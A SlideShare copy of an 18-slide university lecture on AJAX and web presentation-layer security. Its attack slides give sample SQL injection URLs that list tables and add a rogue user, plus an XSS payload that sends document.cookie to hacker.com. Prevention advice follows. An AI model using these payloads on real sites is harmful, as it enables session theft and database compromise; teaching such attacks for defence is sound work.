SlideShare a Scribd company logo

Day8

Download as PPTX, PDF
M
madamewoolf
EducationTechnology
1 of 18
CSE 136 - Lecture 8  AJAX  Presentation Layer Security  Lab
AJAX - what & why?  Asynchronous Javascript and XML  Why? Improve performance  To avoid postback - saves page re-loading time  Transfer smaller amount of data across network  Example: select year, make, model
AJAX - flow
Ajax - postback vs callback
Ajax - ASP.NET Ajax Architecture
Web Attack - Resource Enumeration  Common Files  test.txt  back.zip  upload.zip  passwords.txt  users.txt  checkout.aspx.bak  checkout.asp.old  Common Directories  /admin  /reports  /test  /upload  /temp  /include  /logs
Web Attack - Parameter manipulation  /student/details/1000  change to 1001?  SQL Injection  query = "select product_name from product where product_id=" + PID  PID comes from web parameter:  http://myweb.com/product.aspx?PID=1  http://myweb.com/product.aspx?PID=1;union select name from sysobjects where xtype='U'  Hackers add himself to the Users table  http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
Web Attack – cross site scripting (XSS)  Once you comprise the database, insert javascript into the tables  product.description = ,'<script>document.location='http://hacker.com/collect or.html? cookie='+document.cookie</script>  Hacker now knows your cookie when the content is rendered.  Danger of cross site scripting  Contents of the current document cookie is sent off to hacker.com  Session IDs and authentication tokens are commonly stored in cookies  Javascript can log key strokes
Web Attack - Prevention  Remove all SQL Injection code  HTML-Encode all data displayed to prevent XSS  Treat any input as potential threat  user can enter javascript in textbox and textarea  Use validation on the server (user could disable javascript error checking on browser)  Encrypt cookies  user_id="100" // No  user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS- JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"  Upload Files:  Email attachment  Business documents  Servers should run Virus checker on all uploaded files
Web Attack and AJAX  The methods of a Web service are analogous to the form inputs of a Web application.  They are easy to find, easy to attack  WSDL is now open to public (example data often provided)
Web Attack - Traditional vs AJAX
Web Attack - white vs. black Exposed BL domain model
Web Attack - Ajax security mistakes Solution: Use cookie at the WEB web-service
Web Attack - Securing Ajax server  Install validation filter  Use Regular Expression to validate input strings  Use Regular Expression to remove "attack" characters: < & />, etc  Validate user thru cookies/sessions (WEB web-services)
Review question  Is ajax synchronous or asynchronous?  Why used ajax?  Is ajax architecture more secured or less?  What is XSS?  Difference between white box and black box?
Your assignment  Complete your MVC project with test cases  Project due next Thursday
Lab  Due: Grade your middle tier and test cases
References  .NET : Architecting Applications for the Enterprise  Ajax Security

Recommended

Day6
Day6Day6
Day6
madamewoolf
 
Day2
Day2Day2
Day2
madamewoolf
 
Day7
Day7Day7
Day7
madamewoolf
 
Day1
Day1Day1
Day1
madamewoolf
 
Day4
Day4Day4
Day4
madamewoolf
 
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureCloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
David Chou
 
Microsoft Data Access Technologies
Microsoft Data Access TechnologiesMicrosoft Data Access Technologies
Microsoft Data Access Technologies
David Chou
 
Java on Windows Azure
Java on Windows AzureJava on Windows Azure
Java on Windows Azure
David Chou
 

Recommended

Day6
Day6Day6
Day6
madamewoolf
 
Day2
Day2Day2
Day2
madamewoolf
 
Day7
Day7Day7
Day7
madamewoolf
 
Day1
Day1Day1
Day1
madamewoolf
 
Day4
Day4Day4
Day4
madamewoolf
 
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureCloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
David Chou
 
Microsoft Data Access Technologies
Microsoft Data Access TechnologiesMicrosoft Data Access Technologies
Microsoft Data Access Technologies
David Chou
 
Java on Windows Azure
Java on Windows AzureJava on Windows Azure
Java on Windows Azure
David Chou
 
Microsoft SQL Server 2008
Microsoft SQL Server 2008Microsoft SQL Server 2008
Microsoft SQL Server 2008
Hossein Zahed
 
Entity Framework Overview
Entity Framework OverviewEntity Framework Overview
Entity Framework Overview
ukdpe
 
Web apps architecture
Web apps architectureWeb apps architecture
Web apps architecture
Tanmoy Barman
 
Windows Azure AppFabric
Windows Azure AppFabricWindows Azure AppFabric
Windows Azure AppFabric
David Chou
 
MVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCMVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVC
Anton Krasnoshchok
 
Microsoft Database Options
Microsoft Database OptionsMicrosoft Database Options
Microsoft Database Options
David Chou
 
Enterprise Software Architecture
Enterprise Software ArchitectureEnterprise Software Architecture
Enterprise Software Architecture
rahmed_sct
 
NServicebus WCF Integration 101
NServicebus WCF Integration 101NServicebus WCF Integration 101
NServicebus WCF Integration 101
Rich Helton
 
Overview Of Xaware
Overview Of XawareOverview Of Xaware
Overview Of Xaware
ghessler
 
DOSUG Tech Overview of XAware
DOSUG Tech Overview of XAwareDOSUG Tech Overview of XAware
DOSUG Tech Overview of XAware
Matthew McCullough
 
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingWeblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Evanta Technologies
 
Java database connectivity
Java database connectivityJava database connectivity
Java database connectivity
Vaishali Modi
 
Multi-tenancy in Java
Multi-tenancy in JavaMulti-tenancy in Java
Multi-tenancy in Java
seges
 
Session And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaSession And Cookies In Servlets - Java
Session And Cookies In Servlets - Java
JainamParikh3
 
Jdbc
JdbcJdbc
Jdbc
Mumbai Academisc
 
Jdbc
JdbcJdbc
Jdbc
leminhvuong
 
Oracle WorkManager
Oracle WorkManagerOracle WorkManager
Oracle WorkManager
Giampiero Cerroni
 
Jdbc in servlets
Jdbc in servletsJdbc in servlets
Jdbc in servlets
Nuha Noor
 
JDBC in Servlets
JDBC in ServletsJDBC in Servlets
JDBC in Servlets
Eleonora Ciceri
 
Database and Java Database Connectivity
Database and Java Database ConnectivityDatabase and Java Database Connectivity
Database and Java Database Connectivity
Gary Yeh
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
Dilan Warnakulasooriya
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
Blueinfy Solutions
 

More Related Content

What's hot

Microsoft SQL Server 2008
Microsoft SQL Server 2008Microsoft SQL Server 2008
Microsoft SQL Server 2008
Hossein Zahed
 
Enterprise Software Architecture
Enterprise Software ArchitectureEnterprise Software Architecture
Enterprise Software Architecture
rahmed_sct
 
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingWeblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Evanta Technologies
 

What's hot (20)

Microsoft SQL Server 2008
Microsoft SQL Server 2008Microsoft SQL Server 2008
Microsoft SQL Server 2008
 
Entity Framework Overview
Entity Framework OverviewEntity Framework Overview
Entity Framework Overview
 
Web apps architecture
Web apps architectureWeb apps architecture
Web apps architecture
 
Windows Azure AppFabric
Windows Azure AppFabricWindows Azure AppFabric
Windows Azure AppFabric
 
MVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCMVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVC
 
Microsoft Database Options
Microsoft Database OptionsMicrosoft Database Options
Microsoft Database Options
 
Enterprise Software Architecture
Enterprise Software ArchitectureEnterprise Software Architecture
Enterprise Software Architecture
 
NServicebus WCF Integration 101
NServicebus WCF Integration 101NServicebus WCF Integration 101
NServicebus WCF Integration 101
 
Overview Of Xaware
Overview Of XawareOverview Of Xaware
Overview Of Xaware
 
DOSUG Tech Overview of XAware
DOSUG Tech Overview of XAwareDOSUG Tech Overview of XAware
DOSUG Tech Overview of XAware
 
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingWeblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
 
Java database connectivity
Java database connectivityJava database connectivity
Java database connectivity
 
Multi-tenancy in Java
Multi-tenancy in JavaMulti-tenancy in Java
Multi-tenancy in Java
 
Session And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaSession And Cookies In Servlets - Java
Session And Cookies In Servlets - Java
 
Jdbc
JdbcJdbc
Jdbc
 
Jdbc
JdbcJdbc
Jdbc
 
Oracle WorkManager
Oracle WorkManagerOracle WorkManager
Oracle WorkManager
 
Jdbc in servlets
Jdbc in servletsJdbc in servlets
Jdbc in servlets
 
JDBC in Servlets
JDBC in ServletsJDBC in Servlets
JDBC in Servlets
 
Database and Java Database Connectivity
Database and Java Database ConnectivityDatabase and Java Database Connectivity
Database and Java Database Connectivity
 

Similar to Day8

They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
michelemanzotti
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Shreeraj Shah
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
OWASP
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
johnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
azida3
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
cgt38842
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Shreeraj Shah
 

Similar to Day8 (20)

Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingOWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
AJAX: How to Divert Threats
AJAX: How to Divert ThreatsAJAX: How to Divert Threats
AJAX: How to Divert Threats
 
How to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWSHow to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWS
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
The complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide showThe complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide show
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of users
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 

Recently uploaded

Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.
MateoGardella
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch Letter
MateoGardella
 

Recently uploaded (20)

Mixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
Mixin Classes in Odoo 17 How to Extend Models Using Mixin ClassesMixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
Mixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdf
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...
Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...
Ecological Succession. ( ECOSYSTEM, B. Pharmacy, 1st Year, Sem-II, Environmen...
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptx
 
PROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docxPROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docx
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxpsychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docx
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch Letter
 
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
 

Day8

  • 1. CSE 136 - Lecture 8  AJAX  Presentation Layer Security  Lab
  • 2. AJAX - what & why?  Asynchronous Javascript and XML  Why? Improve performance  To avoid postback - saves page re-loading time  Transfer smaller amount of data across network  Example: select year, make, model
  • 4. Ajax - postback vs callback
  • 5. Ajax - ASP.NET Ajax Architecture
  • 6. Web Attack - Resource Enumeration  Common Files  test.txt  back.zip  upload.zip  passwords.txt  users.txt  checkout.aspx.bak  checkout.asp.old  Common Directories  /admin  /reports  /test  /upload  /temp  /include  /logs
  • 7. Web Attack - Parameter manipulation  /student/details/1000  change to 1001?  SQL Injection  query = "select product_name from product where product_id=" + PID  PID comes from web parameter:  http://myweb.com/product.aspx?PID=1  http://myweb.com/product.aspx?PID=1;union select name from sysobjects where xtype='U'  Hackers add himself to the Users table  http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
  • 8. Web Attack – cross site scripting (XSS)  Once you comprise the database, insert javascript into the tables  product.description = ,'<script>document.location='http://hacker.com/collect or.html? cookie='+document.cookie</script>  Hacker now knows your cookie when the content is rendered.  Danger of cross site scripting  Contents of the current document cookie is sent off to hacker.com  Session IDs and authentication tokens are commonly stored in cookies  Javascript can log key strokes
  • 9. Web Attack - Prevention  Remove all SQL Injection code  HTML-Encode all data displayed to prevent XSS  Treat any input as potential threat  user can enter javascript in textbox and textarea  Use validation on the server (user could disable javascript error checking on browser)  Encrypt cookies  user_id="100" // No  user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS- JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"  Upload Files:  Email attachment  Business documents  Servers should run Virus checker on all uploaded files
  • 10. Web Attack and AJAX  The methods of a Web service are analogous to the form inputs of a Web application.  They are easy to find, easy to attack  WSDL is now open to public (example data often provided)
  • 11. Web Attack - Traditional vs AJAX
  • 12. Web Attack - white vs. black Exposed BL domain model
  • 13. Web Attack - Ajax security mistakes Solution: Use cookie at the WEB web-service
  • 14. Web Attack - Securing Ajax server  Install validation filter  Use Regular Expression to validate input strings  Use Regular Expression to remove "attack" characters: < & />, etc  Validate user thru cookies/sessions (WEB web-services)
  • 15. Review question  Is ajax synchronous or asynchronous?  Why used ajax?  Is ajax architecture more secured or less?  What is XSS?  Difference between white box and black box?
  • 16. Your assignment  Complete your MVC project with test cases  Project due next Thursday
  • 17. Lab  Due: Grade your middle tier and test cases
  • 18. References  .NET : Architecting Applications for the Enterprise  Ajax Security